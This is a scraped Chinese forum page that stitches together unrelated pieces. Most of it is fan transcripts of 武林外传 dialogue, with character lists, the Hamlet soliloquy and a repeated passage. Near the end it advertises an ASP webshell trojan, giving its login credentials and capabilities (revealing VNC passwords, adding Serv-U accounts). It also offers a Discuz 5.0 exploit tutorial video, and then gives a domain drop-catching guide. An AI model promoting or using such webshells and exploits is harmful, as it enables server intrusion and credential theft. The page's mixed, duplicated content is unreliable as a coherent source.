小郭:(理直气壮)当然是他帅,他比你帅一千八~~~百多倍!(见秀才急,忙道)但是你比他有内涵!
秀才:(满意)是她,证明完毕!
湘玉:(迫不及待)该我了,展堂~~你愿意娶我吗?
老白:(斩钉截铁)不愿意。
众人:是他!
老白:(对湘玉)你愿意嫁给我吗?
湘玉:(负气,怒斥)不愿意!!
众人:(挥拳相向)假的!!!
湘玉:(惊吓)我愿意,我愿意!(众人停手)我的神呀,稍不留意就是灭顶之灾……
小贝:该我了该我了,(一把拽住大嘴)大嘴,我来问你,昨天早上没要着卖身契,说我嫂子什么来着?
大嘴:(惊呆,转脸瞥了一眼湘玉,回头对小贝,慌忙)咱咱,咱换个别的题,(干笑)呵呵……
湘玉:就这个,你说我啥来着?
大嘴:(心虚)说你心黑手毒不积德,活该在家守活寡……
(湘玉比画着抽大嘴嘴巴)
小贝:(得意)就是他!
湘玉:(阴笑)哼哼~~太好了,你的卖身契这辈子都不要想要回去了!(拍大嘴)
作者: 紫冰莹月 2007-4-21 14:55 回复此发言
6 回复:武林外传经典台词~~~~~~~~爆笑!!!!
大嘴:(立刻换贼笑脸)啊~~~~~~莫小贝,昨天晚上你的作业谁帮你做的呀?
小贝:(慌张)呃……是我自己做的啦!
众人:假的假的!!(纷纷起身把小贝按于桌上)
小贝:(着急)我~~我还是个孩子,谁能易容成我这个样子嘛!!
(众人不理,准备动手)
小贝:(屈服)好好好~~是邱小东帮我做的啦!讨厌死啦~~!!
(众人松开小贝,各回各位坐好)
老白:全部证明完毕,请燕捕头做指示!(爆笑)
31. (后院,众人获悉包大人的官是买来的后,商量对策)
小六:(拍手,庆幸)好,很好!非常以及特别极其的很好!!他既然是买来的官……(迷惑)那他也是官啊!
湘玉:那可不一定!只要他肯承认,咱们互相就有个牵制,这事就好办了……
老白:(不以为然)他傻呀?明知道要掉脑袋谁能承认呐?!
小郭:不承认就打呗,打到他承认为止!
秀才:诶诶~~~~滥用私刑是犯法的!
小郭:(对秀才,不屑)去!
小六:(坚定)管~~~~~~~不了这么多了!哇呀呀呀~~~~~~~~(指无双)你去,给我找条鞭子过来!(见无双愣神没反应,以干咳提醒)嗯嗯~~~
无双:(回过神来)诶,是鞭子不是皮带!
小六:(急)我是让你去!!
无双:(以为是密令,没反应过来,指着众人)是让我去,不是让你们去!
小六:(对无双,怒斥)去啊!!
无双:(明白过来)哦哦……(跑去找鞭子)
大嘴:(看看无双,对小六道)行,小六,我给你整个煤球炉去啊!(跑去厨房)
小六:越旺越好!!
秀才:(大嘴走后上前,对小六)我给你准备老虎凳哈!(跑去整老虎凳)
小六:越高越好!
芙蓉:(秀才走后上前,对小六)我去给你准备烙铁!(走开)
小六:越烫越好!!
老白:我只能给你准备点——辣椒水!(捧起一把身边晒的干辣椒,走开)
小六:越辣越好!!
湘玉:(温柔状)我心太软,见不得酷刑,这根簪子,你留着用吧啊!(从头上拿下簪子,递给小六)
小六:(盯着簪子,不解)这有嘛用啊??
湘玉:(有经验状,耐心讲解)扎脚心呀!又扎又挠,管叫他又疼又痒还死活的挠不着(得意)……慢用啊!
小六:(用簪子划了一下手试试,惊恐,转脸向镜头)就这还叫心软呐?!(转向湘玉,还簪子)你自己慢用吧啊……
湘玉:(接过簪子插回头上,面向镜头,表情阴狠,暗想道)让你买管搞腐败,等着吃苦头吧……
32. (小郭借狗回来,小狗站在桌上,众人评论纷纷)
秀才:(仔细观察小狗)哎呦,啧啧啧,天哪……
大嘴:(乐)这家伙……
老白:(做敬佩肃穆状)这郭芙蓉行啊!郭芙蓉……
湘玉:(轻视状)这,这,这就是你借来的狗?
小郭:(郑重认真,骄傲地看着小狗)不错,这就是传说中最凶最恶最没人性的……(狰狞相转向湘玉)
湘玉:(怒)呸!
小郭:(被呸得转脸)我忍……郝掌柜说了,整个飞龙谷就属它最凶残,哼,逮谁咬谁,不信你瞧……(手指小狗)
老白:(怒)我瞧我瞧,我瞧啥呀我?!我瞧……
小郭:(不服气)你瞧这牙嘛!还有这……(语塞)……牙!咬上一口,二两肉就没有啦!
湘玉:(忍无可忍)郭~芙~~蓉!!!
小郭:(委屈)你先听我把话说完行不行?你就拿咱们人来说,个大的,武功就一定高吗?
大嘴:(看着小狗)那可不咋地!(转脸见小郭摩拳擦掌,立即改口)咳……当然也有例外哈……
(秀才在一边指着大嘴幸灾乐祸)
小郭:这只狗,在它们宠物界,就相当于西方不败……(神色敬畏)
秀才:(小心翼翼问)怎么看出来的啊?
小郭:别的不说,单看这眼神,别的土狗能有——这种杀气吗?!(做目露凶光状)
(湘玉、老白凑近看小郭的眼睛)
湘玉:好象确实挺凶残的……
作者: 紫冰莹月 2007-4-21 14:56 回复此发言
7 回复:武林外传经典台词~~~~~~~~爆笑!!!!
老白:(点头附和)挺凶残的……
小郭:看我干啥,看狗!!(湘玉、老白急忙转看狗)岂止是凶啊,简直就是凶残之极,狠毒无比!(指手画脚)被它咬上一口,那就是惨绝人寰,惨无人道……
老白:(不耐烦)别白话了!(画面转向小狗,无辜无害的样子,还有点颤抖)是骡子是马,牵出去遛遛!
小郭:遛遛就遛遛,走!(牵着小狗走向门口,开门把小狗哄出门,后赶紧关门)
(屋外大狗狂吠,小狗惨叫)
众人:(起舞唱歌)(粤语)问世间~~是否此山最高~~~哄~~~!哈~~~!另有高处比天高~~~哄~~~!哈~~~!
(小狗惨叫,众人挤到门缝处看情况,都吓得捂眼)
老白:(沉痛)安息吧,我的迷你小壮士……(走去桌前坐下)
大嘴:(沉痛)今晚就拿你的骨头煲汤吧……(回头见湘玉神色愤怒,忙改口)我……我的意思是说,以此纪念这场惨烈的战役……(走去桌前坐下)
湘玉:(悲伤)你会永远留在我们心中,永远永远……(和秀才、小郭一起去桌前坐下)
秀才:(庄重)这就是明知山有狗,偏向狗山行啊!这种以小博大以卵击石的勇气,值得我们学习学习再学习……
小郭:(难过)甭废话了,赶紧拿银子吧!
湘玉:要银子干啥?!
小郭:把狗咬死不得赔钱啊?!
湘玉:(急)又不是我咬死的!……多少钱?
小郭:二两!
(湘玉从凳子上摔到地上,老白拉起她)
老白:别出溜,有点出息行不行……
湘玉:(哭腔)我错了,我真的错了,我从一开始就不应该嫁过来,如果我不嫁过来,我的夫君也不会死,如果我的夫君不死,我怎么会沦落到这么一个伤心的地方……
1.剧组里最喜欢哪个演员?? 2.下部剧有什么可以向我们广大喜爱您剧的观众透露一下下?? 3.不拍电视剧的空闲时间都在干什么?? 4.CCTV-8天天看吗 除夕夜准备看春晚还是武林?? ———————————————————————— 1都喜欢,如果非要逼着我选一个的话,应该是佟湘玉等…… 2下个戏会更大众一些,是一个平民史诗,编剧俞白眉是非常出色的编剧。 3吃喝玩乐,开会,完成单位任务。 4几乎天天都看,春晚和武林来回换着看。
33. (不是台词)
34. (人参汤送上楼,众人焦急等待中)
秀才:(焦急)芙妹,你咋不着急呢??
小郭:(悠闲嗑瓜子)急有什么用啊?人家就是不肯醒!摊上这么个掌柜的呀,真是前世积来的大德!
小贝:(拍案,怒)不许你诋毁我嫂子啊!!
小郭:(悠闲)我错了,刚出炉的新鲜瓜子,(向小贝递出瓜子,小贝不要,白小郭一眼)爱吃不吃……
小贝:(瞥小郭)吃吧吃吧,迟早烧死你……
(大嘴冲出湘玉房)大嘴:(激动)伙计们,掌柜的睁眼啦!!(大嘴回屋,众人激动)
无双:小贝,睁眼啦!(与小贝相拥,秀才见状欲拥小郭,被小郭喝退,转向与南宫残花握手)
秀才:醒了,醒了!
南宫:终于醒了!
秀才:大难不死!
南宫:必有后福!
(大嘴又冲出湘玉房)大嘴:(激动)伙计们,掌柜的开口说话啦!!
无双:说什么啦?
大嘴:水!
无双:还说什么啦?
大嘴:我要水!!(转身回屋)
小贝:(哭)嫂子,我以后再也不逃学,再也不偷吃零食了……(无双、秀才安慰)
小郭:这话你还是过两天再说比较好。
小贝:(奇怪)为什么??
小郭:这人呐,什么时候都得给自己留条后路,明白吗?
小贝:(生气)不明白!但我现在终于明白一点了,你没有人性!
小郭:嗯??
秀才:(严肃)小贝!(小郭等着秀才教训小贝,秀才拉小贝手)你终于长大了……(抱小贝,小郭气结)
(大嘴又冲出湘玉房)大嘴:(激动)伙计们,掌柜的下地了!!
(众人激动)秀才:千年人参呐,真是眨眼就下地了!(大嘴跑下楼梯)
作者: 紫冰莹月 2007-4-21 14:57 回复此发言
8 回复:武林外传经典台词~~~~~~~~爆笑!!!!
大嘴:看,掌柜的冲出来了!!(湘玉站在楼梯口,做好起跑姿势)只见她以百米冲刺的速度向前飞奔,并以矫健的速度下!(湘玉冲下楼梯)正应了那句老话,迅雷不及掩耳盗铃之势如破竹啊!!(湘玉围饭桌狂跑)她一眨眼的功夫就冲到了我们的面前!(湘玉在众人间停住)
湘玉:(渴极)水,我要喝水!
(老白从楼上跑下拉住湘玉)老白:湘玉,你不能再喝了!你看你这肚子!
(湘玉不理,冲向酒坛,开盖欲喝)
小郭:(上前阻拦)这是酒水不是自来水!!
(湘玉奔向柜台,拿砚台欲饮)
秀才:(上前阻拦)那是墨汁不是橘汁!!
(湘玉奔向门口一盆水)
老白:湘玉,湘玉!不行!(上前阻拦)这是抹布水不是矿泉水!!湘玉!
(湘玉冲入后院,老白追入。片刻无声,前厅的众人不知所措)
老白:不好啦!!湘玉跳井啦!!!
(众人大惊,冲入后院)
众人僵持的话外音,先送上一段~~~~~ (61集开始,湘玉提出分手,众人愣住不动,话外音) 小郭生气)有没有搞错,分手也可以随便说的?!长没长脑子啊大姐! 湘玉悔恨)天呐,我都胡说了些什么呀?!天呐天呐天呐…… 秀才:(望着老白,崇敬)老白果然是条汉子,听到这种话居然一点反应都没有,佩服佩服…… 老白:(震惊)我被甩了……我被甩了……我被甩了?!我被甩了!!大嘴:(遐想)真羡慕他们连分手的场面都那么大,我跟惠兰啥动静都没有,就这么分了…… 小贝:(发愁)如果他们打起来,我帮谁呀?帮嫂子的话,白大哥点我;帮白大哥的话,我嫂子又不高兴……干脆谁都不帮,看白戏好了!无双:(不满)说好就好,说散就散,如果这就是所谓的爱情,咿……我宁可不要…… 湘玉:(后悔)老天爷,我求求你,把时间到回去,我愿意付出任何代价…… 老白:(紧张)现在怎么办?怎么办?怎么办?!怎么办呐?!!秀才:(崇敬)都这时候了还这么镇定,这么自信,这么胸有成竹,(冲老白傻乐)老白呀,你真是我的Super Star…… 小郭:(不满)死秀才,那是什么眼神?!你爱的人在这儿呐!看过来,看过来,看过来~~~ 大嘴:(郁闷)惠兰,你在哪儿?(唱)自从在同福客栈见到你~~就像那春风吹进心窝里~~ 小贝:(奇怪)都寻思什么呐??再不开打我可退票了啊!!开打,开打,开打呀!!无双:(遐想)哎呀,如果我有这么好的一个男人,我一定会珍惜他,爱护他,把他当个宝一样,每天关在家里不让他出门,只许陪我一个人说话,只许吃我一个人做的饭……诶,那我为什么不直接养只狗呢??湘玉:(着急)对不起啊展堂,我收回刚才的话,你听见了吗??摩西摩西拉吧……(念咒) 老白:(踌躇)跪下说,她应该会心软吧?问题是当着这么多人咋跪呀?!To 跪 or not to跪,这是个问题…… 湘玉:(踌躇)实在不行,我给你跪下总行了吧……? 老白:(坚定)跪!
必须得跪!要脸有啥用?!幸福才是关键! 湘玉:(坚定)那我真的给你跪下了! 老白:湘玉,等着我,这就来啦! (老白、湘玉同时走向对方,同时低头准备下跪……结果头撞在一起……)
35. 第三次画外音,老白假意要走,众人劝留、
小郭:(着急)哇噻哇噻,有没有搞错,又僵住了……等什么呢,拜托赶紧道歉嘛!都这个时候了面子还能包饺子吃啊?!
湘玉:(踌躇)展堂,你要是走了,我可咋办呀?可我现在要是服软的话,这辈子几抬不起头了,这可咋办,天呐……
老白:(担心)千万别放我走啊,千万千万,我求求你了!
秀才:(崇敬)老白,我今天才明白啥才叫男子汉,对你的崇拜有加深了一百多层……
无双:(犹豫)哎呀……松狮太爱流口水,擦都来不及;诶,大白熊倒是挺干净,就是吃得太多;吉娃娃吃得少,不行不行太凶了;金毛和拉不拉多挺漂亮,可惜又没个性……我为啥不养只猫呢??
小贝:(迫不及待)开打,开打,开打,开打呀!!
吾十有五而志于学,三十而立,四十而不惑,五十而知天命,六十而耳顺,七十而从心所欲,八十而花甲,九十而耄耋。这一百岁咧,他就成人精啦!
湘玉是掌柜的,月钱是常扣的。老百是盗圣的,点子是常出的。
小郭是野蛮的,倒海是用排的。秀才是博学的,举人是难中的。
大嘴是淳朴的,菜刀是玄铁的。小贝是顽皮的,先生是受罪的。
无双是勤劳的,B F是难觅的。老刑是赊帐的,拔刀是常有的。
小六是乡下的,曲艺是全能的。小米是丐帮的,其实是副导的。
朱老是白马的,遭罪是经常的。轩辕是六指的,赌艺是精湛的。
红凌是撒娇的,第一是直觉的。妹儿是四川的,升职是超想的。
惠兰是绝情的,无敌是无奈的。老爹是租来的,说白是跟班的。
云顿是笑脸的,杀人是残忍的。小姬是倒霉的,自杀是被曰的。
窦老是开明的,家教是生动的。赛貂是妖娆的,小翠是姐妹的。
大婶是怡红的,嗓门是最大的。十娘是歌妓的,出门是浮空的。
老罗是卖鸡的,数量是上百的。老五是挖地的,祖传是盗墓的。
范娘是奸商的,上面是有人的。一鸣是豪放的,演员是两位的。
敦儒是衡山的,脾气是最爆的。小芸是老三的,佩剑是娘留的。
钱妻是霸道的,客栈是想骗的。五代是大胃的,巴掌是降龙的。
侯三是泼皮的,众人是喊抽的。守义是未来的,寻死是很难的。
小道是孝顺的,RAP是麻溜的。点红是洁癖的,护肤是秘方的。
白眉是算命的,运气是真好的。伯达是伟岸的,龙门是镖头的。
桐卫是验尸的,工具是恐怖的。石头是幼稚的,前途是无量的。
食神是京城的,味觉是失灵的。清风是随从的,卖刀是无奈的。
无病是弟弟的,问题是最多的。画师是乱找的,武功是鼻祖的。
小东是同学的,藏书是真品的。追风是广州的,九狗是不分的。
老钱是懦弱的,休妻是早想的。小宝是败家的,跳崖是被扔的。
三娘是钩子的,点穴是隔空的。乌龙是坚毅的,龟壳是绝招的。
松涛是好赌的,论剑是造谣的。韩娟是发小的,攀比是嗜好的。
老何是掌门的,说话是结巴的。慕容是记者的,报道是夸张的。
姥爷是七舅的,见官是要跪的。猫咪是杂色的,牵线是专长的。
123是巡犬的,死得是最冤的。大仁是逃跑的,后果是严重的。
展堂是太监的,装MAN是辛苦的。十三是东厂的,杀手是职业的。
南宫是环保的,吹萧是难听的。恭长是长老的,武功是真练的。
仲达是山贼的,淑芬是暗号的。蔷薇是天真的,童言是无忌的。
郭父是巨侠的,开庭是律师的。普森是外籍的,爱国是虚伪的。
卓子是打杂的,戏法是老套的。金湘是美丽的,手段是歹毒的。
星雨是骗子的,真情是动过的。月云是虚荣的,单飞是酝酿的。
子俊是首富的,生意是妈管的。姜妈是高人的,碰上要绕道的。
腾云是帅气的,偶像是自封的。财神是写本的,客串是最烂的。
尚敬是导演的,出镜是有过的。步东是水货的,捕头是候补的。
小安,小李,小柳,小邓,小齐,大帅,小郭,还有老马,小马是常在的,龙套是不易的。
武林是经典的,腐竹是一家的。续集是期待的,喜欢是永远的。
1. 白展堂
被打板子(4回) 被牛踢伤(12回) 被大嘴气吐血/被老邢砸碎手指(13回) 挖地道时掉入(14回) 被小道棒打(22回) 被吕轻侯用头撞了肚子(27回) 被姬无命打吐血(29回) 被小六砍伤腿(36回) 后背被小米的亢龙有悔打入铁钉(38回) 被小被打爬霞(40回) 被公孙乌龙打吐血(44回) 被“黑皮”打了20大板(45回) 被恭长张打吐血(62回) 被佟湘玉掐(63、64回) 被佟湘玉扇/被佟湘玉整成脑震荡/被佟湘玉咬(64回) 被展红凌砍伤(65回)被柳月云揪夏头发(74回) 被凌腾云用核桃打伤手(80回)
2. 吕轻侯
被小郭打掉牙/被小郭撅了胳膊(7回) 被赛貂蝉把酒撒在眼上/被赛貂蝉弄伤眼(11回)被小郭撅了胳膊/被绳勒(23回) 被公孙乌龙打(44回) 被123咬(52回) 被郭蔷薇用分筋断骨手伤(66回) 被小郭暴打(72回)
3. 李大嘴
被打板子(4回) 被老白撅了胳膊(25回) 被枷锁铐伤(58回) 被小六踢伤(60回) 被凌腾云大昏(80回)
4. 郭芙蓉
被老白点得肝疼、身子麻/被开水烫伤(2回) 被公孙乌龙打(44回)
5. 佟湘玉
被嫁妆炸伤(7回) 摔伤腿(61回)
6. 燕小六
被追凌腾云的人打伤(80回)
邢育森
自划自手(50回)
莫小贝
被先生打肿手(26回)
秀才说的 莎士比亚的经典独白:
Hamlet
(Act3,Scene1,lines55-86)
To be, or not to be —that is the question:
Whether'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune
Or to take arms against a sea of troubles,
And by opposing end them. To die —to sleep—
No more; and by a sleep to say we end
The heartache, and the thousand natural shocks
That flesh is heir to. 'Tis a consummation
Devoutly to be wish' d. To die —to sleep.
To sleep —perchance to dream: ay, there's the rub!
For in that sleep of death what dreams may come
When we have shuffled off this mortal coil,
Must give us pause. There's the respect
That makes calamity of so long life.
For who would bear the whips and scorns of time,
Th'oppressor's wrong, the proud man's contumely,
The pangs of despis'd love, the law's delay,
The insolence of office, and the spurns
That patient merit of th'unworthy takes,
When he himself might his quietus make
With a bare bodkin? Who would these fardels bear,
To grunt and sweat under a weary life,
But that the dread of something after death—
The undiscover'd country, from whose bourn
No traveller returns —puzzles the will,
And makes us rather bear those ills we have
Than fly to others that we know not of?
Thus conscience does make cowards of us all,
And thus the native hue of resolution
Is sicklied o'er with the pale cast of thought,
And enterprises of great pitch and this moment
With this regard their currents turn awry
And lose the name of action.
作者: 蓝羽冰恋 2007-3-9 13:34 回复此发言
10 回复:武林外转经典台词~
(中文版)
生存或毁灭, 这是一个问题:
是否应默默的忍受坎苛命运之无情打击,
还是应与深如大海之无涯苦难奋然为敌,
并将其克服。
此二抉择, 就竟是哪个较崇高?
死即睡眠, 它不过如此!
倘若一眠能了结心灵之苦楚与肉体之百患,
那么, 此结局是可盼的!
死去, 睡去...
但在睡眠中可能有梦, 啊, 这就是个阻碍:
当我们摆脱了此垂死之皮囊,
在死之长眠中会有何梦来临?
它令我们踌躇,
使我们心甘情愿的承受长年之灾,
否则谁肯容忍人间之百般折磨,
如暴君之政、骄者之傲、失恋之痛、法章之慢、贪官之侮、或庸民之辱,
假如他能简单的一刃了之?
还有谁会肯去做牛做马, 终生疲於操劳,
默默的忍受其苦其难, 而不远走高飞, 飘於渺茫之境,
倘若他不是因恐惧身後之事而使他犹豫不前?
此境乃无人知晓之邦, 自古无返者。
(老刑)
为了一方百姓 吃再多苦 我也不在乎 受再多的累 我总要面对, 这就是我一个普普通通的捕头的心声 哎 你别走啊 我话还没说完呢 你走什么 你很可疑哦 你眼神因儿不对 神因色不对 你是不是有前科儿啊 你是不是抢劫犯 你给我站住 不站住我可拔刀了
那是一颠倒黑白 添油加醋 胡说八道
1.采访佟:作为一个孤独的单身女人,她时常会感到寂寞,内心的激情象或一样的燃烧着。她的内心,千百次呻吟着、呼唤着...
2.采访贝:由于天资聪明,悟性过人,使她在短时间内悟到了武学的真谛。
3.在笔者揭开莫掌门那神秘面纱的刹那,恶毒的诅咒如期而至、如影随形,给这次访问带来了不可预知的危险!悲剧的序幕才刚刚拉开,隐藏在莫掌门身后的罪恶真相让我们拭目以待!
4.访问郭:由于教育失当,使莫掌门缺乏起码的礼貌,屡次在谈话过程中昏然睡去。暴力的种子在她那有小的心灵里深深地扎了根。一朵本应出淤泥而不染的莲花变成了狗尾巴草!
5.关于吕:一个与世俗格格不入的大侠,一个像迷一样的男子汉,一个寂寞而有深情的旅人,一个视荣华富贵如粪土的狂士,一个懂得享受人生的智者,一个真正活着的男人。这就是他,一个诞生与江湖闻名与朝堂的盖世豪侠!黄金白璧买歌笑,一醉累月轻王侯。(多么富有诗意的名字啊!)面对生活中的挫折和无理的指责,吕大侠的选择便如歌中唱道:你伤害了我,却一笑而过...
6.关于吕:施人恩惠却无动于色,把所有感激化于无形。如此博大的胸怀怎能让人不钦佩!看郭靖杨过,不通文采。乔峰段誉,略嫌老套。一代宗师东方不败,只知深闺锈花鸟啊!
7.关于吕:再难的问题、再大的危机,只要能用智慧解决,他就决不诉诸武力。人不风流枉少年,在吕大侠的四周,灼热而充满期待的目光随处可见,甚至还有风韵犹存的悄寡妇。该名寡妇,甚至有为他献出生命的过激言行。对此情形,吕大侠只有一个回答;请你自重!
8.关于吕:一个人低调一次是惺惺作态,但低调一辈子就是志向高洁,不与世俗同流合污。原本无人关注的狗尾巴草,由于自身的努力,竟然出落成一多出淤泥而不染的莲花!
9.关于吕:为了挽救那些无可救药的堕落少女,吕大侠忍受着世俗不理解的目光,忍受着被人戳脊梁骨的无奈,一次次地伸出了温暖而有力的援手。
10.关于吕:一个娇生惯养的富家千金,为了吕大侠,不惜抛开一切,千里迢迢赶到这里,这是何等的魅力!再苦不能苦孩子,再穷不能穷教育。这两句朴实而有力的话语,一直回荡在吕大侠那忧国忧民的心中。为了百姓安居,为了商户乐业,他倾家荡产也在所不辞。...说实话,我不知道该怎么写。像他这种博大的胸怀已经超出我的描述能力了。
——出自一个自律的撰稿人
大嘴:看,掌柜的冲出来了!!(湘玉站在楼梯口,做好起跑姿势)只见她以百米冲刺的速度向前飞奔,并以矫健的速度下!(湘玉冲下楼梯)正应了那句老话,迅雷不及掩耳盗铃之势如破竹啊!!(湘玉围饭桌狂跑)她一眨眼的功夫就冲到了我们的面前!(湘玉在众人间停住)
湘玉:(渴极)水,我要喝水!
(老白从楼上跑下拉住湘玉)老白:湘玉,你不能再喝了!你看你这肚子!
(湘玉不理,冲向酒坛,开盖欲喝)
小郭:(上前阻拦)这是酒水不是自来水!!
(湘玉奔向柜台,拿砚台欲饮)
秀才:(上前阻拦)那是墨汁不是橘汁!!
(湘玉奔向门口一盆水)
老白:湘玉,湘玉!不行!(上前阻拦)这是抹布水不是矿泉水!!湘玉!
(湘玉冲入后院,老白追入。片刻无声,前厅的众人不知所措)
老白:不好啦!!湘玉跳井啦!!!
(众人大惊,冲入后院)
众人僵持的话外音,先送上一段~~~~~ (61集开始,湘玉提出分手,众人愣住不动,话外音) 小郭生气)有没有搞错,分手也可以随便说的?!长没长脑子啊大姐! 湘玉悔恨)天呐,我都胡说了些什么呀?!天呐天呐天呐…… 秀才:(望着老白,崇敬)老白果然是条汉子,听到这种话居然一点反应都没有,佩服佩服…… 老白:(震惊)我被甩了……我被甩了……我被甩了?!我被甩了!!大嘴:(遐想)真羡慕他们连分手的场面都那么大,我跟惠兰啥动静都没有,就这么分了…… 小贝:(发愁)如果他们打起来,我帮谁呀?帮嫂子的话,白大哥点我;帮白大哥的话,我嫂子又不高兴……干脆谁都不帮,看白戏好了!无双:(不满)说好就好,说散就散,如果这就是所谓的爱情,咿……我宁可不要…… 湘玉:(后悔)老天爷,我求求你,把时间到回去,我愿意付出任何代价…… 老白:(紧张)现在怎么办?怎么办?怎么办?!怎么办呐?!!秀才:(崇敬)都这时候了还这么镇定,这么自信,这么胸有成竹,(冲老白傻乐)老白呀,你真是我的Super Star…… 小郭:(不满)死秀才,那是什么眼神?!你爱的人在这儿呐!看过来,看过来,看过来~~~ 大嘴:(郁闷)惠兰,你在哪儿?(唱)自从在同福客栈见到你~~就像那春风吹进心窝里~~ 小贝:(奇怪)都寻思什么呐??再不开打我可退票了啊!!开打,开打,开打呀!!无双:(遐想)哎呀,如果我有这么好的一个男人,我一定会珍惜他,爱护他,把他当个宝一样,每天关在家里不让他出门,只许陪我一个人说话,只许吃我一个人做的饭……诶,那我为什么不直接养只狗呢??湘玉:(着急)对不起啊展堂,我收回刚才的话,你听见了吗??摩西摩西拉吧……(念咒) 老白:(踌躇)跪下说,她应该会心软吧?问题是当着这么多人咋跪呀?!To 跪 or not to跪,这是个问题…… 湘玉:(踌躇)实在不行,我给你跪下总行了吧……? 老白:(坚定)跪!
必须得跪!要脸有啥用?!幸福才是关键! 湘玉:(坚定)那我真的给你跪下了! 老白:湘玉,等着我,这就来啦! (老白、湘玉同时走向对方,同时低头准备下跪……结果头撞在一起……)
35. 第三次画外音,老白假意要走,众人劝留、
小郭:(着急)哇噻哇噻,有没有搞错,又僵住了……等什么呢,拜托赶紧道歉嘛!都这个时候了面子还能包饺子吃啊?!
湘玉:(踌躇)展堂,你要是走了,我可咋办呀?可我现在要是服软的话,这辈子几抬不起头了,这可咋办,天呐……
老白:(担心)千万别放我走啊,千万千万,我求求你了!
秀才:(崇敬)老白,我今天才明白啥才叫男子汉,对你的崇拜有加深了一百多层……
无双:(犹豫)哎呀……松狮太爱流口水,擦都来不及;诶,大白熊倒是挺干净,就是吃得太多;吉娃娃吃得少,不行不行太凶了;金毛和拉不拉多挺漂亮,可惜又没个性……我为啥不养只猫呢??
小贝:(迫不及待)开打,开打,开打,开打呀!!
蓝屏asp木马2007贺岁版
名字 ice 密码 2007
别问我怎么用
乱点里面的链接自己琢磨吧
反正加了
VNC看密码
SERV-U加帐号
SQL备份
软件语言: 简体中文
软件类型: 国产软件
运行环境: Win9x/NT/2000/XP/2003
授权方式: 免费版
软件大小: 72 K
软件等级: ★★★
整理时间: 2007-3-17 17:52:45
下载连接=>>>
[推荐]DZ5.0漏洞利用动画后续
动画类型: 投稿动画
运行环境: Win9x/NT/2000/XP/2003
授权方式: 投稿收录
动画大小: 31500 K
动画等级: ★★★
整理时间: 2007-3-17 20:47:14
DZ5.0漏洞利用动画后续
******************************************************************************
本动画的MD5值为:
17472245b27623a46a042a249be328ff dzmd5.exe
******************************************************************************
[url=null]下载连接=>>>[/url]
1.一个从未被注册过的域名的抢注。
这种情况下,一般是域名的注册者预见到该域名潜在的价值,在其他人想到之前把该域名注册下来。此范围内包含一些对知名品牌,知名团体或个人的名称、知识产权等。
2.对一个曾经被注册过的域名的抢注。
一个被注册过的域名,如果未能够在有效期结束前及时续费,则会在一段时间后被删除(具体过程见后文详解)。在被删除后的第一时间内,抢先注册到该域名的行为,视作另一种抢注,这也是本文将要涉及的抢注范围。
实际上,一些存在潜在价值的域名,往往都早已被人注册,作为一个域名投资者或正要选取一个域名来开展网上业务者,费力去“想出”或是“造出”一个能够让大家公认很好的域名实在是难上加难。更多的,应该由前人注册过,而因为种种原因被删除的域名中去寻找,可达到事半功倍的效果。
一个域名从被注册到被删除的正常生存历程是这样的:
1.ACTIVE: 正常活动状态。由Registry设置;该域名可以由Registrar更改;可以续费;至少被设置一个DNS(正常情况下要求设定两个)。 也就是正常意义上的正在使用中的域名。
2.REGISTRAR-HOLD: 注册商保留。由该域名的原始注册商设置;该域名不可以被更改或删除;必须由注册商解除此状态才可以更改域名信息;该域名可以续费。该域名不包括在(域名根服务器)的区域中(不能正常使用)。 如果一个域名,在其有效期的最后一天,尚未收到续缴的费用,将会被设置成该状态,此时该域名已无法正常访问,设置成该状态的时间内,原注册人如及时续费,则该域名会马上恢复到ACTIVE状态。如在经过最长45天,原注册人仍未续费,则该域名将被设置为下一个更危险的状态:REDEMPTIONPERIOD。
3.REDEMPTIONPERIOD: 宽限期。当注册商向注册局提出删除域名请求后,由注册局将域名设置称此状态,不过,条件是该域名已经注册了5天以上(如果该域名注册时间不足5天,则立即删除);该域名不包括在(域名根服务器)的区域中(不能正常使用);该域名不可以被更改或清除,只可以被恢复;任何其他注册商提出对此域名的更改或其他请求都将被拒绝;该状态最多保持30天。 在REGISTAR-HOLD状态最长经过45天(一般情况下为30天),而原注册人仍未续费,则该域名被设置为REDEMPTIONPERIOD状态。在此期间,原注册人可以通过注册商将该域名RESTORE回来,但需要交纳一笔远远高于一年注册费的金额(就当作是被绑架后的赎金吧)。 如果在注册局在30天内收到了这笔赎金,则该域名将立即被设置为PENDINGRESTORE状态,该状态的解释为:恢复未决。当注册商提出将处于REDEMPTIONPERIOD的域名恢复请求后,由注册局设置;该域名包含在(域名根服务器)的区域中(可以正常使用);注册商提出的更改或任何其他请求都将被拒绝;在7天之内,有注册商向注册局提供必需的恢复文件,如果注册商在7天之内提供了这些文件,该域名将被置为ACTIVE状态,否则,该域名将重新返回到REDEMPTIONPERIOD状态。
4.PENDINGDELETE 删除未决。如果一个域名在被设置成REDEMPTIONPERIOD状态期间内,注册商没有提出恢复请求,那么,域名将被置于PENDINGDELETE状态,注册商对此域名的任何请求都将被拒绝;5天之后清除。 事情到了这一步,就是真的无法挽回了,被设置成PENDINGDELETE状态的域名,会在5天后准时处以极刑,没有任何方式可以救回这些域名的生命。
但同时,其中一些好的域名,也通过该过程凤凰涅盘,重新被人抢到。这是我们最关注的时刻,无数的域名抢注者操纵着无数的工具和电脑在刑场行刑的同时,进行着另一场战斗。这场战斗发生的时间,是美国东部时间每天下午两点左右开始,大约一个小时之内,不到3点钟的时候,当天将被删除的域名被删除完毕,而其中被人看中的域名,则获得了新生。
以上的介绍包含了域名8个状态中的5个,另外的三个状态及其解释如下:
REGISTRY-LOCK:注册局锁定。由注册局设置;该域名不可以由注册商更改、删除;必须由注册局解除此状态才可以由注册商更改域名信息;域名可以续费;如果域名被指派至少一个DNS则可以包含在(域名根服务器)的区域中(可以正常使用)。
REGISTRY-HOLD:注册局保留。由注册局设置;该域名不可以由注册商更改、删除;必须由注册局解除此状态才可以由注册商更改域名信息;域名可以续费;该域名不包括在(域名根服务器)的区域中(不能正常使用)。
REGISTRAR-LOCK:注册商锁定。由该域名的原始注册商设置;该域名不可以被更改或删除;必须由注册商解除此状态才可以更改域名信息;该域名可以续费。该域名包含在(域名根服务器)的区域中(可以正常使用)。
为了让大家更加清楚域名到期删除的相关规则,具体举例如下:
1:比如域名www.read100.com到期时间为2003年03月01日;
2:从2003年03月02日开始,域名的ns将会被系统自动删除,域名无法解析,但我公司会继续保留该域名30天,用户可以在这30天的期限内续费;
